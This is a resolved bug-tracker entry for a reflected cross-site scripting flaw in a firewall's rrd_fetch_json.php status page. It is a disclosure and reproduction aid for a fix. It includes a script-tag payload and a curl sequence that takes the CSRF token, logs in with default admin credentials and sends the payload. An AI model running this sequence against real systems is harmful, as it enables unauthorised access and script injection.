Actions
Bug #9601
closed
Status_Monitoring rrd_fetch_json.php does not encode errors returned by the RRD module.
Status:
Resolved
Priority:
Normal
Assignee:
Category:
Status_Monitoring
Target version:
Start date:
06/25/2019
Due date:
% Done:
100%
Estimated time:
Plus Target Version:
Affected Version:
All
Affected Plus Version:
Affected Architecture:
All
Description
If rrd_fetch() produces an error, this error is sent back in JSON without any processing. If the user creates a specially-crafted set of parameters, the contents of the error may include user input.
In particular, sending timePeriod=i3i3j<script>alert('XSS')</script>tz9b1 in a POST string will result in an error which includes the original input:{ "error" : "start time: unparsable time: endi3i3j<script>alert('XSS')</script>tz9b1+5min" }
Easiest method to reproduce:
curl -L -k --cookie-jar cookies.txt \
https://192.168.1.1/ \
| grep "name='__csrf_magic'" \
| sed 's/.*value="\(.*\)".*/\1/' > csrf.txt
curl -L -k --cookie cookies.txt --cookie-jar cookies.txt \
--data-urlencode "login=Login" \
--data-urlencode "usernamefld=admin" \
--data-urlencode "passwordfld=pfsense" \
--data-urlencode "__csrf_magic=$(cat csrf.txt)" \
https://192.168.1.1/ > /dev/null
curl -L -k --cookie cookies.txt --cookie-jar cookies.txt \
-d "left=system-processor&right=null&start=&end=&resolution=300&timePeriod=i3i3j<script>alert('XSS')</script>tz9b1&graphtype=line&invert=true&refreshInterval=0" \
https://192.168.1.1/rrd_fetch_json.php
Updated by
Actions